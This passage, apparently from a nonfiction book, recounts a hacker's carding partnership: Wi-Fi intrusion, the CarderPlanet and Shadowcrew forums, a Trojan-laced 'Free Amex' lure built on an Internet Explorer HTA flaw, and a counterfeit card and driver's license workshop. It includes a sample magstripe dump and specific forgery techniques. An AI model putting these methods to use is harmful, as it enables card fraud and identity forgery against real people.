1996, he was thirty-five years old and +had spent more than half his adult life, and a portion of his +childhood, behind bars. He vowed to go straight. With his +mother’s help, he founded a legitimate business called +Mission Pacific Capital, a leasing firm providing computer +and business equipment to start-up companies hustling to +claim their place in the dot-com race. +Clean-cut and handsome with an empathetic gaze, Chris +fit easily into the role of a Southern California entrepreneur. +After a lifetime of crime and uncertainty, the charms of a +normal, middle-class existence had an exotic and satisfying + +normal, middle-class existence had an exotic and satisfying +appeal. He loved traveling to conventions, interviewing and +hiring employees, schmoozing with colleagues. At a +marketing convention in New Orleans, he met Clara Shao +Yen Lee, a stylish woman of Chinese descent who’d +emigrated from Brazil. Taken by Clara’s beauty and +intelligence, he promptly married her. +Under Chris’s leadership, Mission Pacific built a +reputation as an innovative leasing broker, one of the first +to offer instant contracts through the Web, which helped the +firm gain tens of thousands of clients around the country. +The former bank robber and drug smuggler had two +prominent Orange County businessmen as partners and +twenty-one employees working in a spacious office a block +from the Pacific Coast Highway. Clara dropped in +periodically to help out with the look and feel of the +company’s website and marketing material. By 2000, the +couple had an upscale condo in Newport Beach, a son, +and had staked a claim in a business that seemed as +limitless in its potential as the Internet itself. +That spring, the dream died; the dot-com bubble burst, +and the torrent of new companies that had been Mission +Pacific’s lifeblood started to dry up. Then larger companies +like American Express entered the leasing arena, +squeezing out smaller firms. Chris’s company was one of +dozens of leasing brokers to crash and burn. He began +shedding employees and finally had to tell the stragglers +that Mission Pacific wouldn’t be able to cut their next payroll +checks. +Chris went to work for another leasing company but was +cut in a round of layoffs when a large bank acquired the +firm. Meanwhile, his wife gave birth to a second boy. So +when Jeff Norminton showed up talking about the +superhacker he’d met in Taft, Chris was ready to listen. +By the time he and Max met in that North Beach +restaurant, Chris had already been funding Norminton’s +scheme, providing some of the specialized equipment + +Norminton said his hacker needed. Now that Chris had met +Max in person, he was eager for a demonstration. After +talking for hours, the three of them left the coffee shop to +find someplace to hack from. +They wound up at the twenty-seven-story Holiday Inn in +Chinatown, a few blocks away. At Max’s direction, they +asked for a room high above the street. Max positioned +himself at the window, booted his laptop, plugged in the +antenna, and began scanning for Wi-Fi networks. +In 2003, the world was going wireless in a big way and +bringing a massive security hole with it. The revolution had +begun with Apple’s AirPort wireless access point and then +was joined by hardware makers like Linksys and Netgear. +As hardware prices dropped, more and more companies +and home users began breaking free of the tethers of their +blue Ethernet cables. +But the wireless gear being ushered into homes and +offices around the country was a hacker’s dream. It +overwhelmingly employed a wireless standard called +802.11b, which included an encryption scheme that, in +theory, would make it difficult to jump onto someone’s +wireless network without authorization or to passively +eavesdrop on computer traffic. But in 2001, researchers at +the University of California at Berkeley revealed a number +of severe weaknesses in the encryption scheme that made +it crackable with ordinary off-the-shelf equipment and the +right software. And as a practical matter that technical +black magic was usually not even needed. To speed +adoption, manufacturers were shipping wireless access +points with encryption turned off by default. Businesses +small and large simply plugged in the boxes and forgot +about them—sometimes assuming falsely that their office +walls would keep their networks from seeping out onto the +street. +A few months before Max went to jail, a white-hat hacker +had invented a sport called “war driving” to highlight the +prevalence of leaky networks in San Francisco. After + +prevalence of leaky networks in San Francisco. After +slapping a magnetically mounted antenna to the roof of his +Saturn, the white hat cruised the city’s downtown streets +while his laptop scanned for beaconing Wi-Fi access +points. After one hour in the financial district, his setup +would find close to eighty networks. A year and a half had +passed since then, and San Francisco, like other large +cities, was now blanketed in an invisible sea of network +traffic, available to anyone who cared to dip in. +Hacking from home was for idiots and teenagers—Max +had learned that lesson the hard way. Thanks to Wi-Fi, he +could now work from almost anywhere with complete +anonymity. This time, if the police traced back one of Max’s +hack attacks, they’d wind up on the doorstep of whatever +poor sap Max had used for connectivity. +The antenna Max used was a monster, a two-foot-wide +wire-grid parabolic that quickly teased out dozens of +networks from the ether surrounding the Holiday Inn. He +jumped on one and showed Chris how it all worked. +Wielding a vulnerability scanner—the same kind of tool +he’d used in his pen tests—he could quickly scan huge +chunks of Internet address space for known vulnerabilities, +like sending a drift net into the Web. Security holes were +everywhere. He was confident he’d be in financial +institutions and e-commerce sites in no time. It was up to +Norminton and Chris to decide what kind of data they +needed and how they’d exploit it. +Chris was blown away. This six-foot-five, semi- +vegetarian hacker knew his stuff, even if he was rusty from +the joint. +Chris introduced Max to one of his prison contacts, a real +estate fraudster named Werner Janer whom Chris had met +in Terminal Island in ’92. Janer offered to pay Max $5,000 +to penetrate the computer of a personal enemy. He wrote +the check out to Charity so Max wouldn’t have to explain the +income to his probation officer. +The money gave Max some breathing room. He began + +flying to Orange County, misspelling his name on the ticket +so there’d be no record of his violating his supervised +release by leaving the Bay Area. He and Norminton began +crashing at Chris’s place for a week at a stretch, hacking +from Chris’s garage. +He downloaded a list of small-sized financial institutions +from the FDIC’s website, figuring they’d be most +vulnerable, and launched a script to scan each bank for +known security holes. An electronic chime rang out through +the garage whenever it scored a hit. He wormed into the +banks and pulled out customer names, financial data, and +checking account numbers. +The scattershot approach meant Max would be spared +the frustration he’d felt in his last legitimate penetration test. +Hacking any one particular target can be difficult; +depending on the target, maybe even impossible. But scan +hundreds or thousands of systems, and you’re guaranteed +to find some that are soft. It was a numbers game, like +trying car doors as you walk through a parking lot. +Charity had only the broadest notion of what Max was up +to, and she didn’t like it. In an effort to win her over, Chris +and Norminton invited the couple down to Orange County +for a short vacation, paying their way for a weekend at +Disneyland. Charity could see that Max and Chris were +clicking, but something about Chris didn’t smell right. He +was too slick, too polished. +Max’s hacking moved to small e-commerce sites, where +he grabbed transaction histories, some with credit card +numbers. But his efforts were unfocused, and neither Chris +nor Norminton was sure what to do with all the data he was +stealing. +Fortunately, Chris had some money coming in. Werner +Janer owed him $50,000 and was ready to wire-transfer +the money to a bank account of Chris’s choosing. +Determined to get his hands on cold, hard, unreported +cash, Chris asked Norminton to do what he did best; +Norminton agreed to have one of his friends receive the + +Norminton agreed to have one of his friends receive the +transfer and pull it out over the course of a few days. +The first round of withdrawals went as planned, and +Norminton and his friend showed up at Chris’s and handed +over $30,000 in $100 bills. The following day, though, +Norminton reported that his friend had taken ill and would +have to take the day off. +In truth, Norminton had discovered the source of the +windfall: It was Chris’s cut from a real estate scam he’d +helped Janer pull off. The money was dirty, and Norminton +was now implicated in the scheme. The next morning, Chris +found the Honda he’d loaned Norminton parked outside his +office, one tire flat and a fresh dent in the fender. There was +a note from Norminton inside: The FBI is after me. I’m +skipping town. +Chris phoned Norminton’s cash mule, already knowing +what the score would be: Norminton’s associate was in +perfect health and had withdrawn the other $20,000 the day +before, as planned. He’d given it to Norminton. Didn’t Chris +get it? +Chris tracked down Max through Charity and demanded +answers: What did Max know about Norminton’s +whereabouts? Where was Chris’s money? Max was as +surprised as Chris at Norminton’s disappearance, and +eventually the two agreed to continue their partnership +without Norminton. +Max and Chris fell into a routine. Once a month, Chris flew +or drove north and met Max in downtown San Francisco, +where they checked into a hotel. They’d carry Max’s +massive antenna up the fire stairs to their room and mount +it on a tripod near the window. Then Max would putter for a +while to locate a high-speed Wi-Fi with a strong signal. +They learned that altitude wasn’t as important in Wi-Fi +hacking as the sprawl of buildings visible out the window. If +they came up dry, Chris would run down to the front desk to +ask for a different room, explaining earnestly that he + +couldn’t get a cell phone signal or was too afraid of heights +to remain on the twentieth floor. +Max treated it like a job, saying good-bye to Charity and +then vanishing for up to a week into one of the city’s finest +hotels, the Hilton, Westin, W, or Hyatt. While the clang of +cable car bells rose from the streets below, Max cast his +net over cyberspace, scooping up whatever data he could +find—not really sure what he was looking for. +On a whim, he cracked Kimi’s computer and that of her +boyfriend, with whom she’d moved in. Max contemplated +plundering her address book and sending out a mass e- +mail in her name, detailing how she betrayed him. He +thought everyone should know that Kimi’s new life was built +on a foundation of infidelity. +He didn’t go through with it. He had Charity now. Kimi +had moved on, and nothing would be gained by trying to +shame her, he realized. Shortly thereafter, he signed the +divorce papers. +Returning to his work, he began performing Google +searches for guidance in his targeting: What were other +fraudsters doing? How were they monetizing stolen data? +That was when he discovered where the real criminal +action was online: two websites called CarderPlanet and +Shadowcrew. + +11 + +Script’s Twenty-Dollar Dumps +n the spring of 2001, some 150 Russian-speaking +computer criminals convened a summit at a restaurant in +the Ukraine port city of Odessa to brainstorm the launch of +a revolutionary website. Present were Roman Vega, a +thirty-seven-year-old man who sold counterfeit credit cards +to the underground through his online storefront BOA +Factory; a cybercrook known as “King Arthur”; and the man +who would emerge as their leader, a Ukrainian credit card +seller known by the handle “Script.” +The discussion was sparked by the success of a UK- +hosted website erected in 2000 called Counterfeit Library, +which solved one of the fundamental weaknesses of +conducting criminal business in IRC chat rooms, where the +wisdom and experience of years of crime vanished into the +air as soon as the chat was over. Founded by a handful of +Western cybercrooks, Counterfeit Library collected +underground tutorials onto a single website and attached +an online discussion forum where identity thieves could +gather to swap tips and buy and sell “novelty” identification +cards—a euphemism distilled from the same spirit in which +hookers go on “dates.” +Counterfeit Library had more in common with the +electronic bulletin board systems of the pre-Web days than +with IRC. Members could post in permanent discussion +threads and build personal reputations and brands. As +criminals around the globe discovered this patch of dry land +in the murky ephemeral sea of underground commerce, the +site collected hundreds, then thousands, of members from +across North America and Europe. They were identity + +thieves, hackers, phishers, spammers, currency +counterfeiters, credit card forgers, all of whom had been +slaving away in their apartments and warehouses, blind, +until now, to the vastness of their secret brotherhood. +The carders of Eastern Europe had watched Counterfeit +Library with envy. Now they wanted to apply the same +alchemy to their own underground. +In June 2001, the result of the Odessa summit was +unveiled: the International Carders Alliance, or simply +Carderplanet.com, a tightly organized reinvention of +Counterfeit Library catering to the underworld of the former +Soviet empire. While Counterfeit Library was a +freewheeling discussion board and BOA Factory a +straightforward storefront operation, CarderPlanet was a +disciplined online bazaar, charged with the excitement of a +commodities exchange. +Unabashed in its purpose, the site adopted the +nomenclature of the Italian Mafia for its rigid hierarchy. A +registered user was a “sgarrista”—a soldier, without +special privileges. One step up was a “giovane d’honore,” +who helped moderate the discussions under the +supervision of a “capo.” At the top of the food chain was +CarderPlanet’s don, Script. +Russian-speaking vendors flocked to the new site to +offer an array of products and services. Credit card +numbers were a staple, naturally, but only the beginning. +Some sellers specialized in the more valuable “full infos”— +a credit card number accompanied by the owner’s name, +address, Social Security number, and mother’s maiden +name, all for around $30. Hacked eBay accounts were +worth $20. Ambitious buyers could spend $100 for a +“change of billing,” or COB, a stolen credit card account +where the billing address could be changed to a mail drop +under the buyer’s control. Other vendors sold counterfeit +checks or money orders, or rented drop addresses in the +United States where merchandise ordered on American +credit cards could be delivered without raising alarms and + +credit cards could be delivered without raising alarms and +then reshipped to the scammer. +Physical products like blank plastic “magstripe” +(magnetic stripe) cards were in the offering, as well as +“novelty” IDs, complete with holograms, which sold for +anywhere from $75 to $150, depending on the quality. One +could purchase a package of ten identification cards with +the same photo but different names for $500. +CarderPlanet’s registration was open to anyone, but to +sell on the site, vendors first had to submit their products or +services to an approved reviewer for inspection. New +vendors would sometimes be required to escrow their +transactions through Script or to post a bond with the site’s +emergency fund, used to pay out buyers in case an +approved vendor went out of business with unfilled orders +in his queue. Vendors were expected to keep the board +apprised of any vacation plans, safeguard buyers’ +information from hacker attacks, and respond promptly to +customer complaints. “Rippers,” vendors who failed to +deliver on a sale, were subject to banishment, as was any +vendor who accumulated five customer complaints. +CarderPlanet was soon imitated by a second site, this +one aimed at the English-speaking world: Shadowcrew. In +September 2002, after witnessing the stunning success of +CarderPlanet’s regimented hierarchy, a carder named +“Kidd” brought over the heaviest hitters from Counterfeit +Library to do business the Russian way. News of the site +spread through IRC chat rooms and prison yards alike, and +by April 2003, Shadowcrew had four thousand registered +users. +With the motto “For Those Who Like to Play in the +Shadows,” Shadowcrew was at once a study-at-home +college and an online supermarket for nearly anything +illegal. Its tutorials offered lessons on how to use a stolen +credit card number, forge a driver’s license, defeat a +burglar alarm, or silence a gun. It boasted a wiki that +tracked which state driver’s licenses were forgeable. And + +its approved vendors around the world could provide a +dizzying array of illicit products and services: credit reports, +hacked online bank accounts, and names, birth dates, and +Social Security numbers of potential identity theft targets. +As on CarderPlanet, each product had its own +specialists, and every vendor had to be reviewed by a +trusted site member before they were allowed to sell. +Disputes were handled judiciously, with administrators and +moderators working overtime to expose and ban rippers +selling bunk products. +The trading wandered beyond data into tangible items +like ATM skimmers, prescription drugs, and cocaine, and +into services like distributed denial-of-service (DDoS) +attacks—take down any website for $200—and malware +customization to evade antivirus products. One well- +reviewed vendor offered a test-taking service that +promised to get customers technical certifications within +days. A vendor called UBuyWeRush sprang up to flood the +underground with magnetic stripe writers, as well as must- +haves like safety paper and magnetic ink cartridges for +counterfeiting checks. +Child porn was forbidden, and one vendor who asked to +be reviewed for exotic animal sales was laughed off the +board. But nearly anything else was fair game on +Shadowcrew. +By this time, CarderPlanet had launched subforums for +criminals from Asia, Europe, and the States, but it was +Shadowcrew that forged a true international marketplace: a +cross between the Chicago Mercantile Exchange and Star +Wars’s Mos Eisley cantina, where criminals of varying +disciplines could meet up and collaborate on heists. An +identity thief in Denver could buy credit card numbers from +a hacker in Moscow, send them to Shanghai to be turned +into counterfeit cards, then pick up a fake driver’s license +from a forger in Ukraine before hitting the mall. + +Max shared his discovery with Chris, who was fascinated. +Chris logged on to the forums and studied the content like a +textbook. A lot of things hadn’t changed since he’d dealt in +credit card fraud in the 1980s. Other things had changed a +lot. +There was a time when crooks could literally pull credit +card numbers from the trash by Dumpster-diving for +receipts or the carbon-paper slips left over from retailers’ +sliding imprint machines. Now mechanical imprinting was +dead, and Visa and MasterCard insisted that receipts not +include full credit card account numbers. Even if you got the +numbers, that was no longer enough to make counterfeit +cards. The credit card companies now added a special +code to every magnetic stripe—like a PIN, but unknown +even to the cardholder. +Called a Card Verification Value, or CVV, the code is a +number distilled from other data on the stripe—primarily the +account number and expiration date—and then encrypted +with a secret key known only to the issuing bank. When the +magstripe is swiped at the point-of-sale terminal the CVV +is sent along with the account number and other data to the +issuing bank for verification; if it doesn’t match, the +transaction is declined. +When it was introduced by Visa in 1992, the CVV began +driving down fraud costs immediately, from nearly .18 +percent of Visa transactions that year to around .15 percent +a year later. In the 2000s, the innovation proved a strong +bulwark against phishing attacks, in which a spammer +spews thousands of falsified e-mails aimed at luring +consumers into entering their credit card numbers into a +fake bank website. Without the CVV on the magnetic stripe +—which consumers didn’t know, and thus couldn’t reveal— +those stolen numbers were useless at real-world cash +registers. Nobody could walk into a Vegas casino, slap +down a card derived from a phishing attack, and get a pile +of black chips to carry to the roulette table. +MasterCard followed Visa’s lead with its own Card + +MasterCard followed Visa’s lead with its own Card +Security Code, or CSC. Then in 1998, Visa introduced the +CVV2, a different secret code printed on the backs of +cards for consumers to use exclusively over the phone or +the Web. That further reduced crime losses and completed +the Chinese wall between fraud on the Internet and in real +life: Accounts stolen from e-commerce sites or in phishing +attacks could only be used online or over the phone, while +magstripe data could be used in-store but not on the Web, +because it didn’t include the printed CVV2. +By 2002, the security measure had turned raw magstripe +data into one of the underground’s most valuable +commodities and pushed the point of compromise closer +to the consumer. +Hackers began breaching transaction-processing +systems for the data, but the most straightforward way for +ordinary crooks to steal the information was to recruit a +cash-hungry restaurant employee and equip him with a +pocket-sized “skimmer,” a magstripe reader with built-in +memory. As small as a cigarette lighter and readily +concealed in the apron pocket of a fast-food worker or the +suit jacket of an upscale maître d’, a skimmer can hold +hundreds of cards in its memory for later retrieval through a +USB port. A server needs only a second of privacy to swipe +a customer’s card through the device. +In the late 1990s, thieves began fanning out in big cities +across the United States, eyeing waiters, waitresses, and +drive-through attendants who might be interested in a little +extra cash, typically $10 a swipe. Though it was riskier, gas +station managers and retail workers could get in on the +action as well by installing tiny skimming circuit boards in +pay-at-the-pump readers and point-of-sale terminals. Some +of the data would be exploited locally, but much of it was +sent to Eastern Europe, where the swipes were sold over +the Internet ten, twenty, a hundred, or even thousands at a +time. +The carders call these “dumps”; each contained just two + +lines of text, one for each track on a credit card’s three- +inch-long magstripe. +Track 1: B4267841463924615^SMITH/ +JEFFREY^04101012735200521000000 +Track 2: 4267841463924615=041010127352521 +A dump was worth about $20 for a standard card, $50 +for a gold card, and $80 to $100 for a high-limit corporate +card. +Chris decided to try some carding himself. He +determined that Script, the godfather of CarderPlanet, was +the most reliable source of dumps in the world. He paid the +Ukrainian $800 for a set of twenty Visa Classic numbers +and elsewhere parted with around $500 for an MSR206, +the underground’s favorite magnetic stripe encoder. +Once the shoebox-sized MSR206 was plugged into his +computer and the right software installed, he could take an +anonymous Visa gift card, or one of his own credit cards, +and encode it in two quick swipes with one of Script’s +dumps. +With the reprogrammed card burning a hole in his +pocket, Chris browsed his local Blockbuster and some +retailers to scope out the opportunities. Simple magstripe +fraud might be cheap and easy, but it had severe +limitations. Through observation, Chris quickly determined +that shopping for consumer electronics or expensive +clothes would be tough: To guard against what Chris was +contemplating, many high-end stores require the checkout +clerk to physically type the last four digits from the face of +the credit card; the point-of-sale terminal rejects the card, +or worse, if the digits don’t match what’s on the stripe. A +reprogrammed card was only good at spots where +employees never get to lay their hands on the plastic, like +gas stations or drugstores. +Chris made his move at a local supermarket. He loaded +his cart indiscriminately and checked out, sliding his plastic + +through the point-of-sale terminal. After a moment, the word +“Approved” flickered across the display, and somewhere in +America a random consumer was charged for $400 in +groceries. +Chris delivered his ill-gotten groceries to an Orange +County couple in worse financial shape than himself and +then took the husband—a contractor who’d recently had his +tools stolen—to a local Walmart to purchase new +construction gear. Word spread that Chris had credit cards, +and he began doling out his reprogrammed plastic to a few +friends, who were always thoughtful enough to make small +purchases for Chris as a thank-you. +He could see the outlines of a business plan in his +circulating plastic. Drop everything else, he told Max. The +real money is in dumps. + +12 + +Free Amex! +ax broached his plan obliquely with Charity over the +rare indulgence of a sushi dinner. “Which institutions would +you say deserve to be punished the most?” he asked. +He had the answer ready: the moneylenders. The greedy +banks and credit card companies who saddle consumers +with $400 billion in debt each year while charging usurious +interest and hooking kids on plastic before they’ve +graduated college. And because consumers were never +held directly liable for fraudulent charges—by law they could +only be billed for the first $50, and most banks waived even +that—credit card fraud was a victimless crime, costing only +these soulless institutions money. +Credit wasn’t real, Max reasoned, just an abstract +concept; he would be stealing numbers in a system, not +dollars in someone’s pocket. The financial institutions +would be left holding the bag, and they deserved it. +Charity had learned to accept the bitterness Max brought +back from prison: Living with him meant never again +watching a crime drama on TV, because any depiction of +the police as good guys set Max fuming. She wasn’t +entirely sure what Max had in mind now, and she didn’t +want to know. But one thing was clear. Max had decided he +was going to be Robin Hood. +• • • +Max knew exactly where to get the magstripe data Chris +wanted. There were thousands of potential sources sitting +in plain sight, right on CarderPlanet and Shadowcrew. The + +carders themselves would be his prey. +Most of them weren’t hackers, they were just crooks; they +knew a bit about fraud but little about computer security. +They certainly wouldn’t be much harder to hack than the +Pentagon. It was also a morally palatable proposition: He +would be stealing credit card numbers that had already +been stolen—a criminal was going to use them, so it might +as well be Chris Aragon, his criminal. +He started by choosing his weapon, picking out the slick +Bifrost Trojan horse program already circulating online and +customizing it to evade antivirus detection. To test the +results, he used the computer emulation software VMware +to run a dozen different virtual Windows boxes on his +computer at once, each loaded with a different flavor of +security software. +When the malware went undetected on all, he moved to +the next step: harvesting a list of carders’ ICQ numbers and +e-mail addresses from public forum posts, collecting +thousands of them into a database. Then, posing as a well- +known dumps vendor named Hummer911, he fired off a +message to the entire list. The note announced that +Hummer911 had acquired more American Express dumps +than he could use or sell, so he was giving some away. +Click here, Max wrote, to get your free Amex. +When a carder clicked on the link, he found himself +looking at a list of fake Amex dumps Max had generated, +while invisible code on the Web page exploited a new +Internet Explorer vulnerability. +The exploit took advantage of the fact that Internet +Explorer can process more than just Web pages. In 1999, +Microsoft added support for a new type of file called an +HTML Application—a file written in the same markup and +scripting languages used by websites but permitted to do +things on a user’s computer that a website would never be +allowed to do, like creating or deleting files at will and +executing arbitrary commands. The idea was to let +developers already accustomed to programming for the + +developers already accustomed to programming for the +Web use the same skills to craft fully functional desktop +applications. +Internet Explorer recognizes that HTML Applications can +be deadly and won’t execute them from the Web, only from +the user’s hard drive. In theory. +In practice, Microsoft had left a hole in the way the +browser screened content embedded on a Web page. +Many Web pages contain OBJECT tags, which are simple +instructions that tell the browser to grab something from +another Web address—typically a movie or music file—and +include it as part of the page. But it turned out you could +also load an HTML Application through the OBJECT tag +and get it to execute. You just had to disguise it a little. +While Max’s victims salivated over the bogus American +Express dumps, an unseen OBJECT tag instructed their +browsers to pull in a malicious HTML Application that Max +had coded for the occasion. Crucially, Max had given the +file a name ending in “.txt”—a superficial indication that it +was an ordinary text file. Internet Explorer saw that file +name and decided it was safe to run. +Once the browser started downloading the file, however, +Max’s server transmitted a content type indicator of +“application/hta”—identifying it now as an HTML +Application. Essentially, Max’s server changed its story, +presenting the file as a harmless document for the +browser’s security check, then correctly identifying it as an +HTML Application when it came time for the browser to +decide how to interpret the file. +Having judged the file safe based on the name, Internet +Explorer didn’t reevaluate that conclusion once it learned +the truth. It just ran Max’s code as an HTML Application +instead of a Web page. +Max’s HTML Application was a tight Visual Basic script +that wrote out and executed a small grappling-hook +program on the user’s machine. Max named the grappling +hook “hope.exe.” Hope was Charity’s middle name. + +The grappling hook, in turn, downloaded and installed his +modified Bifrost Trojan horse. And just like that, Max was in +control. +• • • +The carders converged like hungry piranhas on his +poisoned page: Hundreds of their machines reported back +to Max for duty. Excited, he began poking around the +criminals’ hard drives at random. He was surprised by how +small-time it all looked. Most of his victims were buying +small batches of dumps, ten or twenty at a time—even less. +But there were lots of carders, and there was nothing to +keep him from returning to their machines over and over +again. In the end, the Free Amex attack would score him +about ten thousand dumps. +He siphoned the dumps to Chris as he found them and +vacuumed other useful data from his victims: details on +their scams, stolen identity information, passwords, mailing +lists used in phishing schemes, some real names, photos, +and e-mail and ICQ addresses of their friends—useful for +future attacks on the underground. +With a single well-constructed ruse, he was now invisibly +embedded in the carders’ ecosystem. This was the start of +something big. He’d be a stick-up man among the carders, +living off whatever he could skim from their illegal economy. +His victims couldn’t call the cops, and with his anonymous +Internet connection and other precautions, he’d be immune +to reprisal. +It wasn’t long, though, before Max discovered that not all +of the carders were what they seemed to be. +The victim was in Santa Ana. When Max strolled into the +computer through his back door and began poking around, +he saw at once that something was very wrong. +The computer was running a program called Camtasia + +that keeps a video record of everything crossing the +computer’s screen—not the kind of information a criminal +normally wants to archive. Max foraged through the hard +drive, and his suspicions were confirmed: The disk was +packed with FBI reports. +Chris was shaken by the discovery of an FBI cybercrime +agent in his own backyard, but Max was intrigued—the +agent’s hard drive offered potentially useful insight into the +bureau’s methods. They talked about what to do next. +Some of the files indicated the agent had an informant who +was providing information on Script, the CarderPlanet +leader who sold Chris his first dumps. Should they warn +Script that there was an informant in his circle? +They decided to do nothing; if he were ever busted, Max +figured, he might be able to play this as a trump card. If it +got out that he’d accidentally hacked an FBI agent, it could +embarrass the bureau, maybe even cost them some +convictions. +He returned to his work hacking the carders. But he knew +now that he wasn’t the only outsider worming into the crime +forums. + +13 + +Villa Siena +alm trees rose at the entrance of Villa Siena, a +sprawling gated community in Irvine, half a mile from John +Wayne Airport. Beyond the front gate, European-inspired +fountains bubbled in the manicured courtyards, and four +swimming pools sparkled blue beneath the sunny Southern +California sky. Residents were enjoying the clubhouse, +relaxing in the spas, getting in a workout at one of the three +fitness rooms, or perhaps visiting the full-time concierge to +make plans for the evening. +In one of the spacious apartments, Chris Aragon was +running his factory. The drapes were drawn over the giant +picture window to hide the riot of machinery crowding the +Ikea tables and granite countertops. He flipped on his card +printer, and it awakened with a whining rumble, wheels +spinning up to speed, motors pulling the ribbons taut as a +hospital bedsheet. +Max was snagging dumps regularly now, and when he +got a new haul, there was no time to waste—the swipes +were stolen property twice over, and Chris had to burn +through them before the crooks who’d purchased or +hacked the numbers maxed them out first or blundered and +got them flagged by the credit card companies. Chris had +tapped the last of his reserves to invest in about $15,000 +worth of credit card printing gear and the apartment to +house it. Now the investment was paying dividends. +Chris loaded blank PVC cards into the hopper of an +unwieldy oblong machine called a Fargo HDP600 card +printer, a $5,000 device used to print corporate ID cards. +With a click on his laptop, the machine drew a card into its + +maw and hummed once, twice, a third, and a fourth time, +each sound marking another color as it moved to a clear +transfer ribbon and was rapidly vaporized by heating +elements and fused to the surface of the card. A final low +grinding from the Fargo meant a clear laminate coat was +settling over the plastic. +It was forty-four seconds from start to finish, and then the +machine spat out the card—a glossy, brightly colored +consumer objet d’art. A bald eagle staring purposefully at a +Capitol One logo, or the grim American Express centurion, +or the simple smudge of sky blue across the white face of a +Sony-branded MasterCard. For the high-limit cards, the +process was the same, except sometimes Chris would +start with gold- or platinum-colored PVC stock, purchased, +like the white cards, in boxes of hundreds. +Once he had a pile of freshly printed plastic in hand, +Chris moved to a second stop in the assembly line: a +monochrome printer for the fine print on the back of the +card. Then if the design called for a hologram, he’d pluck a +sheet of Chinese-produced counterfeits from a stack, align +it carefully in a die punch, and pull the lever to cut out an +oval or rounded rectangle the size of a postage stamp. A +$2,000 Kwikprint Model 55 heat stamper, resembling a drill +press crossed with a medieval torture instrument, fused the +metal foil to the surface of the PVC. +The embosser was next: a giant motorized carousel +wheel of letters and numbers that sounded like an IBM +Selectric as it banged the name, account number, and +expiration date one character at a time into the plastic, +tipping each with silver or gold foil. From a Chinese +supplier, Chris had obtained the special security keys for +Visa’s “flying V” and MasterCard’s joined “MC”—two +distinctive raised characters found only on credit cards, real +and fake. +Credit card verification systems don’t check the +customer’s name, which meant Chris had the luxury of +choosing whatever moniker he liked for the front of his + +choosing whatever moniker he liked for the front of his +plastic; he preferred “Chris Anderson” for the cards he +used himself. On his computer, Chris edited Max’s dumps +to make the name on the magstripe match the alias— +conveniently, the name was the one piece of magstripe +data not used in calculating the CVV security code, so it +could be altered at will. +Finally, it was two swipes through the trusty MSR206 to +program Max’s dump onto the magstripe, and Chris had a +counterfeit credit card that duplicated in nearly every way +the plastic nestled in a consumer’s wallet or purse +somewhere in America. +He wasn’t done yet. +Driver’s licenses were a must for high-end purchases, +and there, too, Chris’s assembly line and Shadowcrew’s +tutorials got the job done. For licenses, he’d switch from +PVC to Teslin, a thinner, more flexible material sold in 8½ × +11 inch sheets. It was one sheet for the front, another for the +back, ten licenses to a sheet. +California licenses include two security features that took +some extra hacking. One is a translucent image of the +California state seal, set in a repeating pattern in the clear +laminate over the face of the license. To simulate it, Chris +used Pearl Ex, a fine colored powder sold at arts-and- +crafts stores for less than three dollars a jar. The trick was +to dust a sheet of laminate with a mix of gold and silver +Pearl Ex, feed it into a printer loaded with a clear ink +cartridge, and print a mirror image of the California pattern +with the transparent ink. It didn’t matter that the ink was +invisible—it was the heat from the print head he was after. +When the sheet came out, the printer had heat-fused the +pattern onto the surface, and the extra Pearl Ex was easily +washed away in a cold rinse. +The ultraviolet printing on the face of the license was no +more difficult. An ordinary ink-jet printer would do the trick, +as long as one drained the ink from the cartridge reservoirs +and replaced it with multicolored UV ink bought in tubes. + +After all the dusting, printing, and washing, Chris was left +with four sheets of material. He would sandwich the two +sheets of printed Teslin between the laminate and run it +through a pressure laminator. After die-cutting, the result +was impressive: Run your fingers over the license and feel +the flawless silken surface; hold it at an angle and witness +the ghostly state seal; put it under a UV bulb, and the state +flag glowed eerily, the words “California Republic” in red, +above them a brown bear walking on four legs across a +yellow hilltop. +With cards and licenses complete, Chris got on the +phone and summoned his girls. He’d figured out that +attractive college-aged women made the best cashers. +There was Nancy, a five-foot-three-inch Latina with “love” +tattooed on one wrist; Lindsey, a pale girl with brown hair +and hazel eyes; Adrian, a young Italian woman; and Jamie, +who’d worked as a waitress at the Hooters in Newport +Beach. +He’d met the twin brunettes Liz and Michelle Esquere at +Villa Siena, where they lived. Michelle was just hanging +around with the group, but Liz was invaluable: She had +worked in the mortgage industry and was whip-smart, well +educated, and responsible enough to take over some of +the administrative work, like maintaining the spreadsheet of +payouts, in addition to making in-store purchases. +Chris had a talent for recruitment. He might meet a new +prospect at a restaurant and invite her to go partying with +his friends. She’d join them at the clubs and expensive +dinners, ride in the back of the rented limousine when one +of them had a birthday to celebrate. She’d see money +everywhere. Then, when the time was right, maybe months +later, maybe when the girl confessed she had bills to pay or +was behind on her rent, he would casually mention that he +knew a way she could earn quick and easy money. He’d tell +her how it worked. It was a victimless crime, he’d explain. +They’d be “sticking it to the man.” +None of the girls knew where Chris got his credit card + +None of the girls knew where Chris got his credit card +data. When he referred to Max, it was as “the Whiz,” an +unnamable superhacker whom they’d never have the +privilege of meeting. Chris’s code name was “the Dude.” +Now that his operation was purring, the Dude was paying +the Whiz around $10,000 a month for the dumps— +transferring the payments through a prepaid debit card +called Green Dot. +Marketed to students and consumers with poor credit, a +Green Dot Visa or MasterCard is a credit card without the +credit: The consumer funds the card in advance with direct +payroll deposits, transfers from a bank account, or cash. +The last option made it an ideal money pipeline between +Chris in Orange County and Max in San Francisco: Chris +would drop in at a neighborhood 7-Eleven or Walgreens +and purchase a Green Dot recharge number, called a +MoneyPak, for any amount up to $500. He’d then IM or e- +mail the number to Max, who’d apply it to one of his Green +Dot cards at the company’s website. He could then use the +card for everyday purchases or make withdrawals from San +Francisco ATMs. +Once his crew arrived, ready for work, Chris passed out +their cards, separated into low-limit classic cards and high- +limit gold and platinum. They should stick to small +purchases for the classics, he’d remind them—$500 or so. +With the high-limit plastic they should go for the big bucks, +purchases from $1,000 to $10,000 dollars. The girls were +all young, but affecting the privileged bearing of stylish +Orange County youth they could walk into a Nordstrom’s +and snatch up a couple of $500 Coach bags without raising +eyebrows, then cross to the other side of the mall and do +the same thing at Bloomingdale’s. +New cashers were always nervous at first, but once the +first fake card was approved at the register, they were +hooked. In no time they’d be sending Chris excited text +messages from their shopping excursions: “Can we use +amex at new bloomingdales?” or “I did over 7k on a mc! + +yeah!” +At the end of the day, they met Chris in a parking lot and +transferred the purses trunk-to-trunk. He paid them on the +spot, 30 percent of the retail value, and carefully recorded +the transaction on a payout sheet like a real businessman. +The handbags—elegant cloth and suede and gleaming +buckles—would go in 